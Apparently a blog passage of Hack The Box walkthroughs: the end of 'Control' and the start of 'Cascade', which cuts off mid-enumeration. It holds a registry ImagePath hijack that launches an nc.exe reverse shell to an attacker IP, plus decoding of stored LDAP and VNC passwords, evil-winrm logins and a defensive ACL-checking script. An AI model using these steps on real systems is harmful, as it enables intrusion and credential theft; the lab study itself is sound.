Sddl   : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
         D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
         3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
         -1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)

The following command makes the SDDL human readable.
It shows that CONTROL\Hector has FullControl over the Services key, so we can modify the ImagePath value that specifies a service's executable.

PS C:\Users\Hector\Documents> $acl = get-acl HKLM:\System\CurrentControlSet\Services
$acl = get-acl HKLM:\System\CurrentControlSet\Services
PS C:\Users\Hector\Documents> ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights
ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights


Owner            : NT AUTHORITY\SYSTEM
Group            : NT AUTHORITY\SYSTEM
DiscretionaryAcl : {NT AUTHORITY\Authenticated Users: AccessAllowed (EnumerateSubKeys, ExecuteKey, Notify, 
                   QueryValues, ReadPermissions), NT AUTHORITY\SYSTEM: AccessAllowed (ChangePermissions, CreateLink, 
                   CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite, 
                   Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey), BUILTIN\Administrators: 
                   AccessAllowed (ChangePermissions, CreateLink, CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, 
                   FullControl, GenericExecute, GenericWrite, Notify, QueryValues, ReadPermissions, SetValue, 
                   TakeOwnership, WriteKey), CONTROL\Hector: AccessAllowed (ChangePermissions, CreateLink, 
                   CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite, 
                   Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey)...}
SystemAcl        : {}
RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor
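As an added example that is not part of the original walkthrough, the following Python parses the SDDL string from the get-acl output above into the same readable form and flags Allow ACEs that grant write-capable rights to principals other than Administrators, SYSTEM or CREATOR OWNER, which is the misconfiguration found on the Services key. The CurrentControlSet SDDL is the page's own; the Services key SDDL and the domain SID standing in for CONTROL\Hector are constructed placeholders, since the page shows only the decoded form of that key.

```python
import re

# One SDDL ACE has the shape (type;flags;rights;object_guid;inherit_guid;sid).
ACE_TYPES = {"A": "AccessAllowed", "D": "AccessDenied", "AU": "SystemAudit"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "IO": "InheritOnly",
             "NP": "NoPropagateInherit", "ID": "Inherited"}
RIGHTS = {"KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE",
          "KX": "KEY_EXECUTE", "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
          "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE", "WD": "WRITE_DAC",
          "WO": "WRITE_OWNER", "RC": "READ_CONTROL", "SD": "DELETE"}
# Well-known SID abbreviations that appear in the get-acl output above.
SIDS = {"BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
        "AU": "NT AUTHORITY\\Authenticated Users",
        "SO": "BUILTIN\\Server Operators", "CO": "CREATOR OWNER",
        "AC": "APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES"}

# Rights that let a principal change a key's values, DACL or owner, which is
# all that is needed to rewrite a service's ImagePath (or to grant oneself that).
WRITE_TOKENS = {"KA", "KW", "GA", "GW", "WD", "WO"}
WRITE_MASK = (0x00000002    # KEY_SET_VALUE
              | 0x00000004  # KEY_CREATE_SUB_KEY
              | 0x00040000  # WRITE_DAC
              | 0x00080000  # WRITE_OWNER
              | 0x10000000  # GENERIC_ALL  (get-acl prints it as 268435456)
              | 0x40000000)  # GENERIC_WRITE
# GENERIC_READ is 0x80000000, which get-acl prints as the signed -2147483648.
PRIVILEGED_SIDS = {"BA", "SY", "CO"}


def _tokens(field):
    """Split a concatenated two-letter token field such as 'CIIOID'."""
    if len(field) % 2:
        raise ValueError(f"odd-length token field: {field!r}")
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def grants_write(rights):
    """True if a rights field (tokens or a hex mask) includes a write right."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & WRITE_MASK)
    return bool(set(_tokens(rights)) & WRITE_TOKENS)


def parse_ace(body):
    parts = body.split(";")
    if len(parts) != 6:
        raise ValueError(f"malformed ACE: ({body})")
    ace_type, flags, rights, _obj_guid, _inherit_guid, sid = parts
    is_hex = rights.lower().startswith("0x")
    return {
        "type": ACE_TYPES.get(ace_type, ace_type),
        "flags": [ACE_FLAGS.get(t, t) for t in _tokens(flags)],
        "rights": [rights] if is_hex else [RIGHTS.get(t, t) for t in _tokens(rights)],
        "rights_raw": rights,
        "sid": sid,
        "trustee": SIDS.get(sid, sid),
    }


def parse_sddl(sddl):
    """Parse 'O:...G:...D:flags(ace)(ace)...' into owner, group and DACL ACEs."""
    m = re.fullmatch(r"O:(.+?)G:(.+?)D:([^(]*)((?:\([^)]*\))*)(?:S:.*)?", sddl)
    if not m:
        raise ValueError("unsupported SDDL layout")
    owner, group, dacl_flags, aces = m.groups()
    return {
        "owner": SIDS.get(owner, owner),
        "group": SIDS.get(group, group),
        "dacl_flags": dacl_flags,
        "dacl": [parse_ace(b) for b in re.findall(r"\(([^)]*)\)", aces)],
    }


def risky_aces(parsed):
    """Allow ACEs giving write-capable rights to a principal other than
    Administrators, SYSTEM or CREATOR OWNER (CONTROL\\Hector's FullControl
    on the Services key is exactly this)."""
    return [ace for ace in parsed["dacl"]
            if ace["type"] == "AccessAllowed"
            and ace["sid"] not in PRIVILEGED_SIDS
            and grants_write(ace["rights_raw"])]


# SDDL of HKLM:\SYSTEM\CurrentControlSet as printed by get-acl on the page.
PAGE_SDDL = (
    "O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)"
    "(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)"
    "(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)"
    "(A;ID;KR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687"
    "-432734479-3232135806-4053264122-3456934681)"
    "(A;CIIOID;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687"
    "-432734479-3232135806-4053264122-3456934681)"
)
# Constructed stand-in for the Services key; the domain SID is a placeholder.
SERVICES_SDDL = ("O:SYG:SYD:AI(A;ID;KR;;;AU)(A;ID;KA;;;SY)(A;ID;KA;;;BA)"
                 "(A;;KA;;;S-1-5-21-1111111111-2222222222-3333333333-1001)")

if __name__ == "__main__":
    for name, sddl in (("CurrentControlSet", PAGE_SDDL), ("Services", SERVICES_SDDL)):
        parsed = parse_sddl(sddl)
        print(f"{name}: owner={parsed['owner']}, {len(parsed['dacl'])} ACEs")
        for ace in risky_aces(parsed):
            print("  RISK:", ace["trustee"], ace["rights"], ace["flags"])
```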

After that, check whether CONTROL\Hector really has permissions on the individual service keys.
As the following result shows, there are over 3000 matching lines: FullControl on every entry (service).

PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List *| findstr /i "Hector Users Path Everyone"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List *| findstr /i "Hector Users Path"
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl

---

PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | measure
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | measure


Count    : 3427
Average  : 
Sum      : 
Maximum  : 
Minimum  : 
Property : 

We can confirm that CONTROL\Hector has permission on wuau (Windows Update Automatic Update) as well.
We can take advantage of this because…

  1. We can restart it manually.
  2. It is already configured to run as LocalSystem.

PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | findstr /i "wuau"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | findstr /i "wuau"
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau


The plan is to get a reverse shell as NT AUTHORITY\SYSTEM.
First, launch a netcat listener on port 4445.

root@kali:~# nc -nlvp 4445
listening on [any] 4445 ...

Since nc.exe is already uploaded, we can use the following command.
It edits the ImagePath value of HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau.
To start the service, run Start-Service wuauserv.

PS C:\> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe -e powershell 10.10.14.42 4445" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe -e powershell 10.10.14.42 4445" /f
The operation completed successfully.
PS C:\> Start-Service wuauserv

Now we have a reverse shell as NT AUTHORITY\SYSTEM.

root@kali:~# nc -nlvp 4445
listening on [any] 4445 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51404
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

As always, root.txt is in the directory C:\Users\Administrator\Desktop\.

PS C:\Windows\system32> cat C:\users\administrator\desktop\root.txt
cat C:\users\administrator\desktop\root.txt
8f8613f5b4da391f36ef11def4cec1b1

Hackthebox Cascade Walkthrough


Explanation

Hackthebox is a website which hosts a set of vulnerable machines on its own VPN.
This is a walkthrough of the box Cascade.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.182 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 20:29 JST
Nmap scan report for 10.10.10.182
Host is up (0.23s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-26 11:40:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m18s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-26T11:41:50
|_  start_date: 2020-07-26T10:12:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 634.60 seconds

SMB Enumeration:

root@kali:~# smbclient -L 10.10.10.182
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

LDAP Enumeration (For naming contexts):

root@kali:~# ldapsearch -h 10.10.10.182 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

LDAP Enumeration:

root@kali:~# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS

---

RPC Enumeration:

root@kali:~# rpcclient -U '' -N 10.10.10.182
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> 

2. Getting User

In the LDAP search result, we can find an interesting attribute, cascadeLegacyPwd: clk0bjVldmE=, on the user r.thompson.

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

We can decode the password with the following command.

root@kali:~# echo clk0bjVldmE= | base64 -d
rY4n5eva

Using evil-winrm, try to log in as r.thompson with the password rY4n5eva.
However, we cannot get a shell, since user r.thompson is not allowed to use WinRM.

root@kali:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.182 -u r.thompson -p rY4n5eva

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Then, enumerate SMB.
There are some interesting shares.

root@kali:~# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445	Name: 10.10.10.182                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Audit$                                            	NO ACCESS	
	C$                                                	NO ACCESS	Default share
	Data                                              	READ ONLY	
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share 

In /Data, we find some interesting files.

root@kali:~# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R data
[+] IP: 10.10.10.182:445	Name: 10.10.10.182                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	data                                              	READ ONLY	
	.\data\*
	dr--r--r--                0 Wed Jan 29 07:05:51 2020	.
	dr--r--r--                0 Wed Jan 29 07:05:51 2020	..
	dr--r--r--                0 Mon Jan 13 10:45:14 2020	Contractors
	dr--r--r--                0 Mon Jan 13 10:45:10 2020	Finance
	dr--r--r--                0 Wed Jan 29 03:04:51 2020	IT
	dr--r--r--                0 Mon Jan 13 10:45:20 2020	Production
	dr--r--r--                0 Mon Jan 13 10:45:16 2020	Temps
	.\data\IT\*
	dr--r--r--                0 Wed Jan 29 03:04:51 2020	.
	dr--r--r--                0 Wed Jan 29 03:04:51 2020	..
	dr--r--r--                0 Wed Jan 29 03:00:30 2020	Email Archives
	dr--r--r--                0 Wed Jan 29 03:04:51 2020	LogonAudit
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	Logs
	dr--r--r--                0 Wed Jan 29 07:06:59 2020	Temp
	.\data\IT\Email Archives\*
	dr--r--r--                0 Wed Jan 29 03:00:30 2020	.
	dr--r--r--                0 Wed Jan 29 03:00:30 2020	..
	fr--r--r--             2522 Wed Jan 29 03:00:30 2020	Meeting_Notes_June_2018.html
	.\data\IT\Logs\*
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	.
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	..
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	Ark AD Recycle Bin
	dr--r--r--                0 Wed Jan 29 09:56:00 2020	DCs
	.\data\IT\Logs\Ark AD Recycle Bin\*
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	.
	dr--r--r--                0 Wed Jan 29 09:53:04 2020	..
	fr--r--r--             1303 Wed Jan 29 10:19:11 2020	ArkAdRecycleBin.log
	.\data\IT\Logs\DCs\*
	dr--r--r--                0 Wed Jan 29 09:56:00 2020	.
	dr--r--r--                0 Wed Jan 29 09:56:00 2020	..
	fr--r--r--             5967 Mon Jan 27 07:22:05 2020	dcdiag.log
	.\data\IT\Temp\*
	dr--r--r--                0 Wed Jan 29 07:06:59 2020	.
	dr--r--r--                0 Wed Jan 29 07:06:59 2020	..
	dr--r--r--                0 Wed Jan 29 07:06:55 2020	r.thompson
	dr--r--r--                0 Wed Jan 29 05:00:05 2020	s.smith
	.\data\IT\Temp\s.smith\*
	dr--r--r--                0 Wed Jan 29 05:00:05 2020	.
	dr--r--r--                0 Wed Jan 29 05:00:05 2020	..
	fr--r--r--             2680 Wed Jan 29 05:00:01 2020	VNC Install.reg

Download all files in the share /Data using smbclient.

root@kali:~# smbclient -U r.thompson //10.10.10.182/data rY4n5eva
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (3.4 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>

In IT/Temp/s.smith, we find a configuration file, VNC Install.reg.

root@kali:~/IT/Temp/s.smith# cat 'VNC Install.reg'
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

This configuration contains the following line, which includes an encrypted password.

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

By googling, we can find a post on cracking VNC passwords.
The stored value is DES-encrypted with a fixed key that is hard-coded in VNC implementations, which is why it can be decrypted offline; Metasploit's Rex library provides a cipher class for this purpose, usable from the msfconsole irb shell.

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> pass="\x17\x52\x6b\x06\x23\x4e\x58\x07"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), pass
=> "sT333ve2"

Then, log in as s.smith using the password sT333ve2.
We get a user shell.

root@kali:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> 

user.txt is in the directory C:\Users\s.smith\Desktop.

*Evil-WinRM* PS C:\Users\s.smith\Documents> cat C:\Users\s.smith\Desktop\user.txt
dfa503e9bc06ef4d8ef096943283c014

3. Getting Root

Take a look at the current user.
s.smith is in the Audit Share, IT and Remote Management Use groups.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   7/28/2020 3:21:54 AM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

In PowerShell, the following command shows the same user information, including every AD attribute of the object.

*Evil-WinRM* PS C:\Users\s.smith\Documents> Get-ADUser -identity s.smith -properties *


AccountExpirationDate              :
accountExpires                     : 9223372036854775807
AccountLockoutTime                 :
AccountNotDelegated                : False
AllowReversiblePasswordEncryption  : False
BadLogonCount                      : 0
badPasswordTime                    : 132403764963483208
badPwdCount                        : 0
CannotChangePassword               : True
CanonicalName                      : cascade.local/UK/Users/Steve Smith
Certificates                       : {}
City                               :
CN                                 : Steve Smith
codePage                           : 0
Company                            :
Country                            :
countryCode                        : 0
Created                            : 1/9/2020 6:08:13 PM
createTimeStamp                    : 1/9/2020 6:08:13 PM
Deleted                            :
Department                         :
Description                        :
DisplayName                        : Steve Smith
DistinguishedName                  : CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
Division                           :
DoesNotRequirePreAuth              : False
dSCorePropagationData              : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/13/2020 4:36:28 PM, 1/9/2020 6:08:13 PM...}
EmailAddress                       :
EmployeeID                         :
EmployeeNumber                     :
Enabled                            : True
Fax                                :
GivenName                          : Steve
HomeDirectory                      :
HomedirRequired                    : False
HomeDrive                          :
HomePage                           :
HomePhone                          :
Initials                           :
instanceType                       : 4
isDeleted                          :
LastBadPasswordAttempt             : 7/28/2020 3:21:36 AM
LastKnownParent                    :
lastLogoff                         : 0
lastLogon                          : 132403765148187532
LastLogonDate                      : 7/28/2020 3:21:54 AM
lastLogonTimestamp                 : 132403765148187532
LockedOut                          : False
logonCount                         : 16
LogonWorkstations                  :
Manager                            :
MemberOf                           : {CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local, CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local, CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local}
MNSLogonAccount                    : False
MobilePhone                        :
Modified                           : 7/28/2020 3:21:54 AM
modifyTimeStamp                    : 7/28/2020 3:21:54 AM
msDS-User-Account-Control-Computed : 0
Name                               : Steve Smith
nTSecurityDescriptor               : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                     : CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
ObjectClass                        : user
ObjectGUID                         : 38ebd9df-c4f7-4d00-9a9f-f503432ffa7d
objectSid                          : S-1-5-21-3332504370-1206983947-1165150453-1107
Office                             :
OfficePhone                        :
Organization                       :
OtherName                          :
PasswordExpired                    : False
PasswordLastSet                    : 1/28/2020 7:58:05 PM
PasswordNeverExpires               : True
PasswordNotRequired                : False
POBox                              :
PostalCode                         :
PrimaryGroup                       : CN=Domain Users,CN=Users,DC=cascade,DC=local
primaryGroupID                     : 513
ProfilePath                        :
ProtectedFromAccidentalDeletion    : False
pwdLastSet                         : 132247150854857364
SamAccountName                     : s.smith
sAMAccountType                     : 805306368
ScriptPath                         : MapAuditDrive.vbs
sDRightsEffective                  : 0
ServicePrincipalNames              : {}
SID                                : S-1-5-21-3332504370-1206983947-1165150453-1107
SIDHistory                         : {}
SmartcardLogonRequired             : False
sn                                 : Smith
State                              :
StreetAddress                      :
Surname                            : Smith
Title                              :
TrustedForDelegation               : False
TrustedToAuthForDelegation         : False
UseDESKeyOnly                      : False
userAccountControl                 : 66048
userCertificate                    : {}
UserPrincipalName                  : s.smith@cascade.local
uSNChanged                         : 323714
uSNCreated                         : 16404
whenChanged                        : 7/28/2020 3:21:54 AM
whenCreated                        : 1/9/2020 6:08:13 PM

Since we have a new user, enumerate the SMB shares again.
Now we have read access to Audit$, a share we previously could not access at all.

root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445	Name: 10.10.10.182                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Audit$                                            	READ ONLY	
	C$                                                	NO ACCESS	Default share
	Data                                              	READ ONLY	
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share

Alternatively, we can use smbclient as well (but it does not show the access permissions).

root@kali:~# smbclient -L 10.10.10.182 -U s.smith
Enter WORKGROUP\s.smith's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Audit$          Disk      
	C$              Disk      Default share
	Data            Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

Then, take a look at the newly obtained share Audit$.

root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$
